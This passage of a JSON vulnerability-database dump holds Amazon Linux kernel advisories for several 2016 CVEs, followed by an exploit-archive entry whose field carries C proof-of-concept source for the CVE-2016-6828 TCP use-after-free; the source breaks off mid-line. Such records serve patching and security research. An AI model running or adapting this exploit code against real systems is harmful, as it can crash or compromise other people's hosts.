"kernel-devel-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-devel-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-devel-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "perf-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-tools-devel-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "i686", "packageFilename": "kernel-headers-4.4.19-29.55.amzn1.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.19-29.55.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}], "description": "**Issue Overview:**\n\nA use after free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions.\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-devel-4.4.19-29.55.amzn1.i686 \n kernel-headers-4.4.19-29.55.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.19-29.55.amzn1.i686 \n kernel-tools-4.4.19-29.55.amzn1.i686 \n kernel-tools-debuginfo-4.4.19-29.55.amzn1.i686 \n kernel-debuginfo-4.4.19-29.55.amzn1.i686 \n kernel-tools-devel-4.4.19-29.55.amzn1.i686 \n kernel-4.4.19-29.55.amzn1.i686 \n perf-debuginfo-4.4.19-29.55.amzn1.i686 \n perf-4.4.19-29.55.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.19-29.55.amzn1.noarch \n \n src: \n kernel-4.4.19-29.55.amzn1.src \n \n x86_64: \n kernel-debuginfo-4.4.19-29.55.amzn1.x86_64 \n perf-4.4.19-29.55.amzn1.x86_64 \n perf-debuginfo-4.4.19-29.55.amzn1.x86_64 \n kernel-tools-4.4.19-29.55.amzn1.x86_64 \n kernel-tools-devel-4.4.19-29.55.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.19-29.55.amzn1.x86_64 \n kernel-4.4.19-29.55.amzn1.x86_64 \n kernel-devel-4.4.19-29.55.amzn1.x86_64 \n kernel-headers-4.4.19-29.55.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.19-29.55.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2016-09-01T18:00:00", "title": "Medium: kernel", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:28", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-6828"], "modified": "2016-09-01T18:00:00", "id": "ALAS-2016-740", "href": "https://alas.aws.amazon.com/ALAS-2016-740.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:14", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "noarch", "packageFilename": "kernel-doc-4.4.14-24.50.amzn1.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-headers-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "perf-debuginfo-4.4.14-24.50.amzn1.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "perf-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "perf-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-devel-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "src", "packageFilename": "kernel-4.4.14-24.50.amzn1.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-devel-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-tools-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-tools-devel-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-headers-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "perf-4.4.14-24.50.amzn1.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-4.4.14-24.50.amzn1.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.14-24.50.amzn1", "arch": "x86_64", "packageFilename": "kernel-devel-4.4.14-24.50.amzn1.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}], "description": "**Issue Overview:**\n\nA flaw was discovered in processing setsockopt for 32 bit processes on 64 bit systems. This flaw will allow attackers to alter arbitary kernel memory when unloading a kernel module. This action is usually restricted to root-priveledged users but can also be leveraged if the kernel is compiled with CONFIG_USER_NS and CONFIG_NET_NS. ([CVE-2016-4997 __](<https://access.redhat.com/security/cve/CVE-2016-4997>))\n\nAn out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. ([CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>))\n\nA vulnerability was found in the Linux kernel. The pointer to the netlink socket attribute is not checked, which could cause a null pointer dereference when parsing the nested attributes in function tipc_nl_publ_dump(). \nThis allows local users to cause a DoS. ([CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>))\n\nA double free vulnerability was found in netlink_dump, which could cause a denial of service or possibly other unspecified impact. ([CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>))\n\n(Updated on 2016-07-14: [CVE-2016-4998 __](<https://access.redhat.com/security/cve/CVE-2016-4998>) and [CVE-2016-4951 __](<https://access.redhat.com/security/cve/CVE-2016-4951>) were fixed in this version, but was not previously listed in this errata.)\n\n(Updated on 2017-01-19: [CVE-2016-9806 __](<https://access.redhat.com/security/cve/CVE-2016-9806>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.4.14-24.50.amzn1.i686 \n kernel-devel-4.4.14-24.50.amzn1.i686 \n kernel-tools-4.4.14-24.50.amzn1.i686 \n perf-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-4.4.14-24.50.amzn1.i686 \n kernel-headers-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.14-24.50.amzn1.i686 \n kernel-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.i686 \n kernel-tools-devel-4.4.14-24.50.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.14-24.50.amzn1.noarch \n \n src: \n kernel-4.4.14-24.50.amzn1.src \n \n x86_64: \n perf-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-4.4.14-24.50.amzn1.x86_64 \n kernel-headers-4.4.14-24.50.amzn1.x86_64 \n kernel-devel-4.4.14-24.50.amzn1.x86_64 \n perf-4.4.14-24.50.amzn1.x86_64 \n kernel-tools-devel-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-4.4.14-24.50.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.14-24.50.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2017-01-19T16:30:00", "title": "Medium: kernel", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:14", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-9806", "CVE-2016-4951", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2017-01-19T16:30:00", "id": "ALAS-2016-718", "href": "https://alas.aws.amazon.com/ALAS-2016-718.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:19", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "perf-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-tools-devel-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "perf-debuginfo-4.4.8-20.46.amzn1.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-headers-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-tools-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-devel-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "src", "packageFilename": "kernel-4.4.8-20.46.amzn1.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "noarch", "packageFilename": "kernel-doc-4.4.8-20.46.amzn1.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "perf-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-devel-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-headers-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "kernel-devel-4.4.8-20.46.amzn1.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "i686", "packageFilename": "perf-4.4.8-20.46.amzn1.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.8-20.46.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-4.4.8-20.46.amzn1.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}], "description": "**Issue Overview:**\n\nAn integer overflow vulnerability was found in xt_alloc_table_info, which on 32-bit systems can lead to small structure allocation and a copy_from_user based heap corruption. ([CVE-2016-3135 __](<https://access.redhat.com/security/cve/CVE-2016-3135>))\n\nIn the mark_source_chains function (net/ipv4/netfilter/ip_tables.c) it is possible for a user-supplied ipt_entry structure to have a large next_offset field. This field is not bounds checked prior to writing a counter value at the supplied offset. ([CVE-2016-3134 __](<https://access.redhat.com/security/cve/CVE-2016-3134>))\n\nA weakness was found in the Linux ASLR implementation. Any user able to run 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited. ([CVE-2016-3672 __](<https://access.redhat.com/security/cve/CVE-2016-3672>))\n\nDestroying a network interface with a large number of IPv4 addresses keeps a rtnl_lock for a very long time, which can block many network-related operations. ([CVE-2016-3156 __](<https://access.redhat.com/security/cve/CVE-2016-3156>))\n\nA use-after-free vulnerability was found in the kernel's socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. ([CVE-2016-7117 __](<https://access.redhat.com/security/cve/CVE-2016-7117>))\n\n(Updated on 2017-01-19: [CVE-2016-7117 __](<https://access.redhat.com/security/cve/CVE-2016-7117>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-4.4.8-20.46.amzn1.i686 \n kernel-4.4.8-20.46.amzn1.i686 \n kernel-devel-4.4.8-20.46.amzn1.i686 \n kernel-tools-4.4.8-20.46.amzn1.i686 \n perf-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.8-20.46.amzn1.i686 \n kernel-tools-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-debuginfo-4.4.8-20.46.amzn1.i686 \n kernel-tools-devel-4.4.8-20.46.amzn1.i686 \n kernel-headers-4.4.8-20.46.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.8-20.46.amzn1.noarch \n \n src: \n kernel-4.4.8-20.46.amzn1.src \n \n x86_64: \n kernel-debuginfo-common-x86_64-4.4.8-20.46.amzn1.x86_64 \n perf-debuginfo-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-4.4.8-20.46.amzn1.x86_64 \n kernel-4.4.8-20.46.amzn1.x86_64 \n kernel-tools-devel-4.4.8-20.46.amzn1.x86_64 \n kernel-debuginfo-4.4.8-20.46.amzn1.x86_64 \n perf-4.4.8-20.46.amzn1.x86_64 \n kernel-devel-4.4.8-20.46.amzn1.x86_64 \n kernel-headers-4.4.8-20.46.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2017-01-19T16:30:00", "title": "Medium: kernel", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:19", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-7117", "CVE-2016-3156", "CVE-2016-3135", "CVE-2016-3672", "CVE-2016-3134"], "modified": "2017-01-19T16:30:00", "id": "ALAS-2016-694", "href": "https://alas.aws.amazon.com/ALAS-2016-694.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-04T19:29:26", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "Marco Grassi", "published": "2016-11-08T00:00:00", "title": "Linux Kernel - TCP Related Read Use-After-Free Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-11-08T00:00:00", "href": "https://0day.today/exploit/description/26265", "id": "1337DAY-ID-26265", "sourceData": "// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html\r\n \r\n// to build clang derp4.c -o derp4 -static\r\n \r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n \r\n#ifndef SYS_mmap\r\n#define SYS_mmap 9\r\n#endif\r\n#ifndef SYS_socket\r\n#define SYS_socket 41\r\n#endif\r\n#ifndef SYS_bind\r\n#define SYS_bind 49\r\n#endif\r\n#ifndef SYS_sendto\r\n#define SYS_sendto 44\r\n#endif\r\n#ifndef SYS_setsockopt\r\n#define SYS_setsockopt 54\r\n#endif\r\n#ifndef SYS_dup\r\n#define SYS_dup 32\r\n#endif\r\n#ifndef SYS_sendmsg\r\n#define SYS_sendmsg 46\r\n#endif\r\n#ifndef SYS_recvfrom\r\n#define SYS_recvfrom 45\r\n#endif\r\n#ifndef SYS_write\r\n#define SYS_write 1\r\n#endif\r\n \r\nlong r[62];\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\n while (1) {\r\n pid_t pid = fork();\r\n \r\n if (pid == 0) {\r\n r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);\r\n memcpy((void*)0x20006000, \"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128);\r\n r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);\r\n r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n memcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165);\r\n memcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28);\r\n r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);\r\n *(uint32_t*)0x20001fff = (uint32_t)0x2;\r\n r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);\r\n r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);\r\n *(uint32_t*)0x20018000 = (uint32_t)0x4;\r\n r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);\r\n *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;\r\n *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;\r\n *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;\r\n *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;\r\n *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;\r\n *(uint64_t*)0x2000dff0 = (uint64_t)0x0;\r\n *(uint32_t*)0x2000dff8 = (uint32_t)0x4;\r\n *(uint16_t*)0x2000e000 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000e002 = (uint16_t)0x0;\r\n *(uint32_t*)0x2000e004 = (uint32_t)0xffff;\r\n *(uint32_t*)0x2000e008 = (uint32_t)0x401;\r\n *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;\r\n *(uint64_t*)0x20000008 = (uint64_t)0x37;\r\n *(uint32_t*)0x2000ed3a = (uint32_t)0x14;\r\n *(uint16_t*)0x2000ed3e = (uint16_t)0x2;\r\n *(uint16_t*)0x2000ed40 = (uint16_t)0x12;\r\n *(uint32_t*)0x2000ed42 = 